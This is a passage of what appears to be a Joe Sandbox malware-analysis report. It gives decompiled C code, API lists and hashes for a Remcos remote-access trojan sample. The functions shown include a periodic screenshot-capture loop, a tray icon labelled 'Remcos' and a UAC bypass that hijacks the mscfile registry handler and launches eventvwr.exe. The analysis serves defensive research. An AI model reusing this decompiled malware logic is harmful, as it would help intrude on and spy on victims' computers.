                                                                      												_t131 = _t257 * 8; // 0x30ff0c46
                                                                      												E004427C2( *((intOrPtr*)(_t246 + _t131 + 0x24)));
                                                                      												_t134 = _t207 * 4; // 0xcbd5
                                                                      												E004427C2( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
                                                                      												_t231 = _v704;
                                                                      												 *((intOrPtr*)(_v716 + _t246)) = _t231;
                                                                      												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
                                                                      											}
                                                                      										}
                                                                      										_t229 = _v732;
                                                                      										 *_t229 = 1;
                                                                      										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
                                                                      									} else {
                                                                      										 *(_v716 + _t246) = _t228;
                                                                      										_t115 = _t207 * 4; // 0xcbd5
                                                                      										E004427C2( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
                                                                      										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
                                                                      										E004427C2(_v732);
                                                                      										 *(_t246 + 8) = _v740;
                                                                      										goto L1;
                                                                      									}
                                                                      									goto L2;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							goto L2;
                                                                      						}
                                                                      						goto L47;
                                                                      					}
                                                                      					asm("sbb eax, eax");
                                                                      					_t158 = _t157 | 0x00000001;
                                                                      					__eflags = _t158;
                                                                      					goto L10;
                                                                      				} else {
                                                                      					L1:
                                                                      					L2:
                                                                      					return E004318FB(_v8 ^ _t262);
                                                                      				}
                                                                      				L47:
                                                                      			}

                                                                      0x004415b4
                                                                      0x004415c2
                                                                      0x004415c8
                                                                      0x004415cb
                                                                      0x004415cb
                                                                      0x00441599
                                                                      0x004415da
                                                                      0x004415e2
                                                                      0x004415eb
                                                                      0x00441544
                                                                      0x0044154a
                                                                      0x0044154d
                                                                      0x00441554
                                                                      0x00441566
                                                                      0x0044156d
                                                                      0x0044157a
                                                                      0x00000000
                                                                      0x0044157a
                                                                      0x00000000
                                                                      0x00441542
                                                                      0x0044139b
                                                                      0x00441316
                                                                      0x00000000
                                                                      0x00441316
                                                                      0x00000000
                                                                      0x00441314
                                                                      0x0044130d
                                                                      0x0044130f
                                                                      0x0044130f
                                                                      0x00000000
                                                                      0x00441299
                                                                      0x00441299
                                                                      0x0044129b
                                                                      0x004412ab
                                                                      0x004412ab
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
                                                                        • Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
                                                                        • Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
                                                                        • Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3
                                                                      • _memcmp.LIBVCRUNTIME ref: 004414E3
                                                                      • _free.LIBCMT ref: 00441554
                                                                      • _free.LIBCMT ref: 0044156D
                                                                      • _free.LIBCMT ref: 0044159F
                                                                      • _free.LIBCMT ref: 004415A8
                                                                      • _free.LIBCMT ref: 004415B4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorLast$_abort_memcmp
                                                                      • String ID: <@$C
                                                                      • API String ID: 1679612858-110480577
                                                                      • Opcode ID: 1048d56563eeec5036fde7c123c800c622b58e08fc70498468e367d4350c89e2
                                                                      • Instruction ID: 5577a6a45bcddffb5f6216a997b053df11b1957fa34d8d06bb10a8a0fa2b22ac
                                                                      • Opcode Fuzzy Hash: 1048d56563eeec5036fde7c123c800c622b58e08fc70498468e367d4350c89e2
                                                                      • Instruction Fuzzy Hash: CAB13C75A012199FEB24DF19C884AAEB7B4FB48304F5045EEE949A7360D774AE90CF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E00416832() {
                                                                      				intOrPtr* _t42;
                                                                      				void* _t45;
                                                                      				char* _t54;
                                                                      				void* _t72;
                                                                      				long _t78;
                                                                      				void* _t83;
                                                                      				struct _SECURITY_ATTRIBUTES* _t85;
                                                                      				struct _SECURITY_ATTRIBUTES* _t92;
                                                                      				void* _t131;
                                                                      				void* _t132;
                                                                      				void* _t140;
                                                                      				void* _t141;
                                                                      				void* _t146;
                                                                      				intOrPtr _t147;
                                                                      				void* _t148;
                                                                      				void* _t149;
                                                                      				void* _t150;
                                                                      
                                                                      				E00453798(E00453BAF, _t146);
                                                                      				_push(_t141);
                                                                      				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
                                                                      				_t92 = 0;
                                                                      				 *((intOrPtr*)(_t146 - 4)) = 0;
                                                                      				_t149 =  *0x46de94 - _t92; // 0x0
                                                                      				if(_t149 == 0) {
                                                                      					_t147 = _t147 - 0xc;
                                                                      					_t131 = _t146 - 0x68;
                                                                      					E00415151(_t131);
                                                                      					__imp__GdiplusStartup(0x46de94, _t131, 0);
                                                                      				}
                                                                      				_t150 =  *0x46dd64 - _t92; // 0x0
                                                                      				if(_t150 == 0) {
                                                                      					E00401ED3(0x46e980, _t132, _t141, E00415D23(_t146 - 0x40, _t132));
                                                                      					E00401EC9();
                                                                      				}
                                                                      				_t42 = E00401F6B(E00401E25(0x46e600, _t132, _t146, _t150, 0x19));
                                                                      				_t45 = E00401EC4(E00418385(_t146 - 0x58, E00401E25(0x46e600, _t132, _t146, _t150, 0x1a)));
                                                                      				_t134 =  *_t42;
                                                                      				E00401ED3(0x46e968,  *_t42, 0x46e968, E0041905E(_t146 - 0x40,  *_t42, _t45));
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				CreateDirectoryW(E00401EC4(0x46e968), _t92);
                                                                      				E00401F46(_t92, _t146 - 0xb0);
                                                                      				E00401F46(_t92, _t146 - 0x80);
                                                                      				 *(_t146 - 0x11) = _t92;
                                                                      				 *0x46dd5b = 1;
                                                                      				_t54 =  *((intOrPtr*)(_t146 + 8));
                                                                      				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                                                                      				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                                                                      				_t140 = Sleep;
                                                                      				L6:
                                                                      				while(1) {
                                                                      					if( *_t54 != 1) {
                                                                      						L11:
                                                                      						GetLocalTime(_t146 - 0x28);
                                                                      						_push( *(_t146 - 0x1c) & 0x0000ffff);
                                                                      						_push( *(_t146 - 0x1e) & 0x0000ffff);
                                                                      						_push( *(_t146 - 0x20) & 0x0000ffff);
                                                                      						_push( *(_t146 - 0x22) & 0x0000ffff);
                                                                      						_push( *(_t146 - 0x26) & 0x0000ffff);
                                                                      						E0041512B(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
                                                                      						_t147 = _t147 + 0x20;
                                                                      						E00401ED3(_t146 - 0x80, _t66, _t145, E00402FD4(_t92, _t146 - 0x58, E00402FD4(_t92, _t146 - 0x40, E004078F9(_t146 - 0x98, 0x46e968, _t146, "\\"), _t140, _t146, __eflags, _t146 - 0x2b8), _t140, _t146, __eflags, "."));
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						E00401EC9();
                                                                      						_t72 = E00401EC4(_t146 - 0x80);
                                                                      						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
                                                                      						E00416668(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
                                                                      						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
                                                                      						if(__eflags != 0) {
                                                                      							_t92 = 0;
                                                                      							 *(_t146 - 0x11) = 0;
                                                                      							_t78 = E004383EC(_t75, E00401F6B(E00401E25(0x46e600, _t134, _t146, __eflags, 0x18))) * 0x3e8;
                                                                      							__eflags = _t78;
                                                                      						} else {
                                                                      							_t78 = E004383EC(_t79, E00401F6B(E00401E25(0x46e600, _t134, _t146, __eflags, 0x15))) * 0xea60;
                                                                      						}
                                                                      						Sleep(_t78);
                                                                      						_t54 =  *((intOrPtr*)(_t146 + 8));
                                                                      						continue;
                                                                      					}
                                                                      					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
                                                                      					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
                                                                      					while(1) {
                                                                      						_t153 = _t92;
                                                                      						if(_t92 != 0) {
                                                                      							goto L11;
                                                                      						}
                                                                      						_t83 = E00401F6B(E00401E25(0x46e600, _t134, _t146, _t153, 0x17));
                                                                      						_t148 = _t147 - 0x18;
                                                                      						E0040413E(_t92, _t148, _t134, _t146, _t83);
                                                                      						_t85 = E00418A82(0, _t134);
                                                                      						_t147 = _t148 + 0x18;
                                                                      						_t92 = _t85;
                                                                      						 *(_t146 - 0x11) = _t92;
                                                                      						if(_t92 != 0) {
                                                                      							goto L11;
                                                                      						}
                                                                      						Sleep(0x3e8);
                                                                      					}
                                                                      					goto L11;
                                                                      				}
                                                                      			}

                                                                      0x00416837
                                                                      0x00416843
                                                                      0x00416845
                                                                      0x00416848
                                                                      0x0041684a
                                                                      0x0041684d
                                                                      0x00416853
                                                                      0x00416855
                                                                      0x00416858
                                                                      0x0041685b
                                                                      0x00416869
                                                                      0x00416869
                                                                      0x0041686f
                                                                      0x00416875
                                                                      0x00416885
                                                                      0x0041688d
                                                                      0x0041688d
                                                                      0x004168a2
                                                                      0x004168be
                                                                      0x004168c4
                                                                      0x004168d7
                                                                      0x004168df
                                                                      0x004168e7
                                                                      0x004168f5
                                                                      0x00416901
                                                                      0x00416909
                                                                      0x0041690e
                                                                      0x00416911
                                                                      0x00416922
                                                                      0x00416928
                                                                      0x0041692b
                                                                      0x0041692e
                                                                      0x00000000
                                                                      0x00416934
                                                                      0x00416937
                                                                      0x0041697f
                                                                      0x00416983
                                                                      0x0041698d
                                                                      0x00416992
                                                                      0x00416997
                                                                      0x0041699c
                                                                      0x004169a1
                                                                      0x004169af
                                                                      0x004169b4
                                                                      0x004169f3
                                                                      0x004169fb
                                                                      0x00416a03
                                                                      0x00416a0e
                                                                      0x00416a16
                                                                      0x00416a1e
                                                                      0x00416a23
                                                                      0x00416a30
                                                                      0x00416a33
                                                                      0x00416a51
                                                                      0x00416a53
                                                                      0x00416a6a
                                                                      0x00416a6a
                                                                      0x00416a35
                                                                      0x00416a49
                                                                      0x00416a49
                                                                      0x00416a72
                                                                      0x00416a74
                                                                      0x00000000
                                                                      0x00416a74
                                                                      0x00416939
                                                                      0x0041693e
                                                                      0x00416941
                                                                      0x00416941
                                                                      0x00416943
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00416953
                                                                      0x00416958
                                                                      0x0041695e
                                                                      0x00416965
                                                                      0x0041696a
                                                                      0x0041696d
                                                                      0x0041696f
                                                                      0x00416974
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041697b
                                                                      0x0041697b
                                                                      0x00000000
                                                                      0x00416941

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00416837
                                                                      • GdiplusStartup.GDIPLUS(0046DE94,?,00000000), ref: 00416869
                                                                        • Part of subcall function 00416668: SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004166C1
                                                                        • Part of subcall function 00416668: DeleteFileW.KERNEL32(00000000,0000001B,?,00000000), ref: 00416752
                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004168F5
                                                                      • Sleep.KERNEL32(000003E8), ref: 0041697B
                                                                      • GetLocalTime.KERNEL32(?), ref: 00416983
                                                                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00416A72
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateSleep$DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTime
                                                                      • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                      • API String ID: 198735477-3790400642
                                                                      • Opcode ID: 2794c85a3811543ca87b7101c6f09f6a5fdd6faffe9bcd6634c62b7f9fcd2b77
                                                                      • Instruction ID: ce0ddbc7aa7556f63f789618e214f7464cfce56c68888e1c6d0d9b9a3e5ecacd
                                                                      • Opcode Fuzzy Hash: 2794c85a3811543ca87b7101c6f09f6a5fdd6faffe9bcd6634c62b7f9fcd2b77
                                                                      • Instruction Fuzzy Hash: A4517F71A002549ACB04BBB6CC666EE77A9AF55309F00007FF405B71E2EE3C9D85C799
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00405FCD(void* __ebx, void* __ecx, void* __edx) {
                                                                      				char _v28;
                                                                      				char _v52;
                                                                      				void* __ebp;
                                                                      				void* _t8;
                                                                      				void* _t10;
                                                                      				void* _t11;
                                                                      				void* _t12;
                                                                      				void* _t14;
                                                                      				void* _t21;
                                                                      				void* _t24;
                                                                      				void* _t28;
                                                                      				void* _t50;
                                                                      				void* _t51;
                                                                      
                                                                      				_t28 = __ecx;
                                                                      				if( *0x46c9c0 != 0) {
                                                                      					return 1;
                                                                      				}
                                                                      				_t8 = E0040616B(__ecx);
                                                                      				__eflags = _t8 - 0x3a9f;
                                                                      				if(_t8 < 0x3a9f) {
                                                                      					_push(_t28);
                                                                      					E00410B1D( &_v28, 0x80000000, "mscfile\\shell\\open\\command", 0x461084);
                                                                      					_t10 = E0040243C();
                                                                      					_t11 = E00401F6B(0x46e5e8);
                                                                      					_t12 = E0040243C();
                                                                      					_t14 = E00401F6B( &_v28);
                                                                      					E00410EBB(E00401F6B(0x46e5a0), __eflags, "origmsc", _t14, _t12 + 1, _t11, _t10);
                                                                      					_push(2);
                                                                      					E0040413E(__ebx, _t51 + 0x18 - 0x18, _t15, _t50, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe");
                                                                      					_push(0x4610ec);
                                                                      					E00410D87(0x80000001, L"Software\\Classes\\mscfile\\shell\\open\\command");
                                                                      					E00419012( &_v52, 0x34, "eventvwr.exe");
                                                                      					_t21 = ShellExecuteW(0, L"open", E00401EC4( &_v52), 0x4610ec, 0x4610ec, 0);
                                                                      					__eflags = _t21 - 0x20;
                                                                      					if(_t21 <= 0x20) {
                                                                      						E00401EC9();
                                                                      						E00401F98();
                                                                      						_t24 = 2;
                                                                      						return _t24;
                                                                      					}
                                                                      					ExitProcess(0);
                                                                      				}
                                                                      				return _t8;
                                                                      			}

                                                                      APIs
                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,004610EC,004610EC,00000000), ref: 0040609C
                                                                      • ExitProcess.KERNEL32 ref: 004060A9
                                                                      Strings
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, xrefs: 00406057
                                                                      • open, xrefs: 00406095
                                                                      • origmsc, xrefs: 00406037
                                                                      • eventvwr.exe, xrefs: 00406076
                                                                      • mscfile\shell\open\command, xrefs: 00405FFB
                                                                      • Software\Classes\mscfile\shell\open\command, xrefs: 00406066
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteExitProcessShell
                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                                                      • API String ID: 1124553745-764209389
                                                                      • Opcode ID: 06ca3f3384782627d30c825c711d39c2dfa1a3fcc9e01c627d626a4fa05f1e9a
                                                                      • Instruction ID: cc03ee05f47f5838a6603ec0c7285f0b31397286879bee9164bb4503c7af3d3b
                                                                      • Opcode Fuzzy Hash: 06ca3f3384782627d30c825c711d39c2dfa1a3fcc9e01c627d626a4fa05f1e9a
                                                                      • Instruction Fuzzy Hash: C611F071A442016ADB14B2A2DC57FEF32689B00709F50003FF502BA1E2EEBC5885829E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00419D46(void* __eflags) {
                                                                      				struct tagMSG _v32;
                                                                      				char _v300;
                                                                      				int _t14;
                                                                      
				/* Analyst note: 0x46deb8 is a global NOTIFYICONDATAA (cbSize 0x1fc = 508). The stores below fill hWnd (+4, from the
				   window created in E00419DF8), uID (+8), uCallbackMessage (+0x10, WM_USER+1), hIcon (+0x14, icon extracted from the
				   running module) and szTip (+0x18, "Remcos"); uFlags (+0xc) = 7 = NIF_MESSAGE|NIF_ICON|NIF_TIP. Shell_NotifyIconA(0, ...)
				   is NIM_ADD, so the sample registers a tray icon titled "Remcos" and then pumps messages for it. */
				GetModuleFileNameA(0,  &_v300, 0x104);
                                                                      				 *0x46debc = E00419DF8();
                                                                      				0x46deb8->cbSize = 0x1fc;
                                                                      				 *0x46dec0 = 1;
                                                                      				 *0x46dec8 = 0x401;
                                                                      				 *0x46decc = ExtractIconA(0,  &_v300, 0);
                                                                      				lstrcpynA(0x46ded0, "Remcos", 0x80);
                                                                      				 *0x46dec4 = 7;
                                                                      				Shell_NotifyIconA(0, 0x46deb8);
                                                                      				while(1) {
                                                                      					_t14 = GetMessageA( &_v32, 0, 0, 0);
                                                                      					if(_t14 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					TranslateMessage( &_v32);
                                                                      					DispatchMessageA( &_v32);
                                                                      				}
                                                                      				return _t14;
                                                                      			}

                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00419D5F
                                                                        • Part of subcall function 00419DF8: RegisterClassExA.USER32(00000030), ref: 00419E44
                                                                        • Part of subcall function 00419DF8: CreateWindowExA.USER32 ref: 00419E5F
                                                                        • Part of subcall function 00419DF8: GetLastError.KERNEL32 ref: 00419E69
                                                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 00419D96
                                                                      • lstrcpynA.KERNEL32(0046DED0,Remcos,00000080), ref: 00419DB0
                                                                      • Shell_NotifyIconA.SHELL32(00000000,0046DEB8), ref: 00419DC6
                                                                      • TranslateMessage.USER32(?), ref: 00419DD2
                                                                      • DispatchMessageA.USER32 ref: 00419DDC
                                                                      • GetMessageA.USER32 ref: 00419DE9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                      • String ID: Remcos
                                                                      • API String ID: 1970332568-165870891
                                                                      • Opcode ID: 3eaa85d4fba7fccbdf8ac3d96a38bd6b0f7f78d731f301dc6a2c1f84f57ee185
                                                                      • Instruction ID: 27bb3bb9e9425415d9785be7a8916ce8a2329f455831ddd7e5a75271eee1e707
                                                                      • Opcode Fuzzy Hash: 3eaa85d4fba7fccbdf8ac3d96a38bd6b0f7f78d731f301dc6a2c1f84f57ee185
                                                                      • Instruction Fuzzy Hash: 470152B1E04309ABC7109FA1ED4DEDB7ABCBBE5706F00002AF5119A161E7F99485CB59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E00448A74(signed int _a4, void* _a8, unsigned int _a12) {
                                                                      				signed int _v5;
                                                                      				char _v6;
                                                                      				void* _v12;
                                                                      				unsigned int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				void* _v32;
                                                                      				long _v36;
                                                                      				void* _v40;
                                                                      				long _v44;
                                                                      				signed int* _t143;
                                                                      				signed int _t145;
                                                                      				intOrPtr _t149;
                                                                      				signed int _t153;
                                                                      				signed int _t155;
                                                                      				signed char _t157;
                                                                      				unsigned int _t158;
                                                                      				intOrPtr _t162;
                                                                      				void* _t163;
                                                                      				signed int _t164;
                                                                      				signed int _t167;
                                                                      				long _t168;
                                                                      				intOrPtr _t175;
                                                                      				signed int _t176;
                                                                      				intOrPtr _t178;
                                                                      				signed int _t180;
                                                                      				signed int _t184;
                                                                      				char _t191;
                                                                      				char* _t192;
                                                                      				char _t199;
                                                                      				char* _t200;
                                                                      				signed char _t211;
                                                                      				signed int _t213;
                                                                      				long _t215;
                                                                      				signed int _t216;
                                                                      				char _t218;
                                                                      				signed char _t222;
                                                                      				signed int _t223;
                                                                      				unsigned int _t224;
                                                                      				intOrPtr _t225;
                                                                      				unsigned int _t229;
                                                                      				signed int _t231;
                                                                      				signed int _t232;
                                                                      				signed int _t233;
                                                                      				signed int _t234;
                                                                      				signed int _t235;
                                                                      				signed char _t236;
                                                                      				signed int _t237;
                                                                      				signed int _t239;
                                                                      				signed int _t240;
                                                                      				signed int _t241;
                                                                      				signed int _t242;
                                                                      				signed int _t246;
                                                                      				void* _t248;
                                                                      				void* _t249;
                                                                      
                                                                      				_t213 = _a4;
                                                                      				if(_t213 != 0xfffffffe) {
                                                                      					__eflags = _t213;
                                                                      					if(_t213 < 0) {
                                                                      						L58:
                                                                      						_t143 = E0043992E();
                                                                      						 *_t143 =  *_t143 & 0x00000000;
                                                                      						__eflags =  *_t143;
                                                                      						 *((intOrPtr*)(E00439941())) = 9;
                                                                      						L59:
                                                                      						_t145 = E0043862C();
                                                                      						goto L60;
                                                                      					}
                                                                      					__eflags = _t213 -  *0x46da00; // 0x40
                                                                      					if(__eflags >= 0) {
                                                                      						goto L58;
                                                                      					}
                                                                      					_v24 = 1;
                                                                      					_t239 = _t213 >> 6;
                                                                      					_t235 = (_t213 & 0x0000003f) * 0x30;
                                                                      					_v20 = _t239;
                                                                      					_t149 =  *((intOrPtr*)(0x46d800 + _t239 * 4));
                                                                      					_v28 = _t235;
                                                                      					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                                                                      					_v5 = _t222;
                                                                      					__eflags = _t222 & 0x00000001;
                                                                      					if((_t222 & 0x00000001) == 0) {
                                                                      						goto L58;
                                                                      					}
                                                                      					_t223 = _a12;
                                                                      					__eflags = _t223 - 0x7fffffff;
                                                                      					if(_t223 <= 0x7fffffff) {
                                                                      						__eflags = _t223;
                                                                      						if(_t223 == 0) {
                                                                      							L57:
                                                                      							return 0;
                                                                      						}
                                                                      						__eflags = _v5 & 0x00000002;
                                                                      						if((_v5 & 0x00000002) != 0) {
                                                                      							goto L57;
                                                                      						}
                                                                      						__eflags = _a8;
                                                                      						if(_a8 == 0) {
                                                                      							goto L6;
                                                                      						}
                                                                      						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                                                                      						_v5 = _t153;
                                                                      						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                                                                      						_t246 = 0;
                                                                      						_t155 = _t153 - 1;
                                                                      						__eflags = _t155;
                                                                      						if(_t155 == 0) {
                                                                      							_t236 = _v24;
                                                                      							_t157 =  !_t223;
                                                                      							__eflags = _t236 & _t157;
                                                                      							if((_t236 & _t157) != 0) {
                                                                      								_t158 = 4;
                                                                      								_t224 = _t223 >> 1;
                                                                      								_v16 = _t158;
                                                                      								__eflags = _t224 - _t158;
                                                                      								if(_t224 >= _t158) {
                                                                      									_t158 = _t224;
                                                                      									_v16 = _t224;
                                                                      								}
                                                                      								_t246 = E004421F7(_t224, _t158);
                                                                      								E004427C2(0);
                                                                      								E004427C2(0);
                                                                      								_t249 = _t248 + 0xc;
                                                                      								_v12 = _t246;
                                                                      								__eflags = _t246;
                                                                      								if(_t246 != 0) {
                                                                      									_t162 = E00447364(_t213, 0, 0, _v24);
                                                                      									_t225 =  *((intOrPtr*)(0x46d800 + _t239 * 4));
                                                                      									_t248 = _t249 + 0x10;
                                                                      									_t240 = _v28;
                                                                      									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                                                                      									_t163 = _t246;
                                                                      									 *(_t240 + _t225 + 0x24) = _t236;
                                                                      									_t235 = _t240;
                                                                      									_t223 = _v16;
                                                                      									L21:
                                                                      									_t241 = 0;
                                                                      									_v40 = _t163;
                                                                      									_t215 =  *((intOrPtr*)(0x46d800 + _v20 * 4));
                                                                      									_v36 = _t215;
                                                                      									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                                                                      									_t216 = _a4;
                                                                      									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                                                                      										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                                                                      										_v6 = _t218;
                                                                      										__eflags = _t218 - 0xa;
                                                                      										_t216 = _a4;
                                                                      										if(_t218 != 0xa) {
                                                                      											__eflags = _t223;
                                                                      											if(_t223 != 0) {
                                                                      												_t241 = _v24;
                                                                      												 *_t163 = _v6;
                                                                      												_t216 = _a4;
                                                                      												_t232 = _t223 - 1;
                                                                      												__eflags = _v5;
                                                                      												_v12 = _t163 + 1;
                                                                      												_v16 = _t232;
                                                                      												 *((char*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2a)) = 0xa;
                                                                      												if(_v5 != 0) {
                                                                      													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2b));
                                                                      													_v6 = _t191;
                                                                      													__eflags = _t191 - 0xa;
                                                                      													if(_t191 != 0xa) {
                                                                      														__eflags = _t232;
                                                                      														if(_t232 != 0) {
                                                                      															_t192 = _v12;
                                                                      															_t241 = 2;
                                                                      															 *_t192 = _v6;
                                                                      															_t216 = _a4;
                                                                      															_t233 = _t232 - 1;
                                                                      															_v12 = _t192 + 1;
                                                                      															_v16 = _t233;
                                                                      															 *((char*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2b)) = 0xa;
                                                                      															__eflags = _v5 - _v24;
                                                                      															if(_v5 == _v24) {
                                                                      																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2c));
                                                                      																_v6 = _t199;
                                                                      																__eflags = _t199 - 0xa;
                                                                      																if(_t199 != 0xa) {
                                                                      																	__eflags = _t233;
                                                                      																	if(_t233 != 0) {
                                                                      																		_t200 = _v12;
                                                                      																		_t241 = 3;
                                                                      																		 *_t200 = _v6;
                                                                      																		_t216 = _a4;
                                                                      																		_t234 = _t233 - 1;
                                                                      																		__eflags = _t234;
                                                                      																		_v12 = _t200 + 1;
                                                                      																		_v16 = _t234;
                                                                      																		 *((char*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2c)) = 0xa;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									_t164 = E0044FDE4(_t216);
                                                                      									__eflags = _t164;
                                                                      									if(_t164 == 0) {
                                                                      										L41:
                                                                      										_v24 = 0;
                                                                      										L42:
                                                                      										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
                                                                      										__eflags = _t167;
                                                                      										if(_t167 == 0) {
                                                                      											L53:
                                                                      											_t168 = GetLastError();
                                                                      											_t241 = 5;
                                                                      											__eflags = _t168 - _t241;
                                                                      											if(_t168 != _t241) {
                                                                      												__eflags = _t168 - 0x6d;
                                                                      												if(_t168 != 0x6d) {
                                                                      													L37:
                                                                      													E0043990B(_t168);
                                                                      													goto L38;
                                                                      												}
                                                                      												_t242 = 0;
                                                                      												goto L39;
                                                                      											}
                                                                      											 *((intOrPtr*)(E00439941())) = 9;
                                                                      											 *(E0043992E()) = _t241;
                                                                      											goto L38;
                                                                      										}
                                                                      										_t229 = _a12;
                                                                      										__eflags = _v36 - _t229;
                                                                      										if(_v36 > _t229) {
                                                                      											goto L53;
                                                                      										}
                                                                      										_t242 = _t241 + _v36;
                                                                      										__eflags = _t242;
                                                                      										L45:
                                                                      										_t237 = _v28;
                                                                      										_t175 =  *((intOrPtr*)(0x46d800 + _v20 * 4));
                                                                      										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                                                                      										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                                                                      											__eflags = _v5 - 2;
                                                                      											if(_v5 == 2) {
                                                                      												__eflags = _v24;
                                                                      												_push(_t242 >> 1);
                                                                      												_push(_v40);
                                                                      												_push(_t216);
                                                                      												if(_v24 == 0) {
                                                                      													_t176 = E004485D0();
                                                                      												} else {
                                                                      													_t176 = E004488E0();
                                                                      												}
                                                                      											} else {
                                                                      												_t230 = _t229 >> 1;
                                                                      												__eflags = _t229 >> 1;
                                                                      												_t176 = E00448790(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                                                                      											}
                                                                      											_t242 = _t176;
                                                                      										}
                                                                      										goto L39;
                                                                      									}
                                                                      									_t231 = _v28;
                                                                      									_t178 =  *((intOrPtr*)(0x46d800 + _v20 * 4));
                                                                      									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
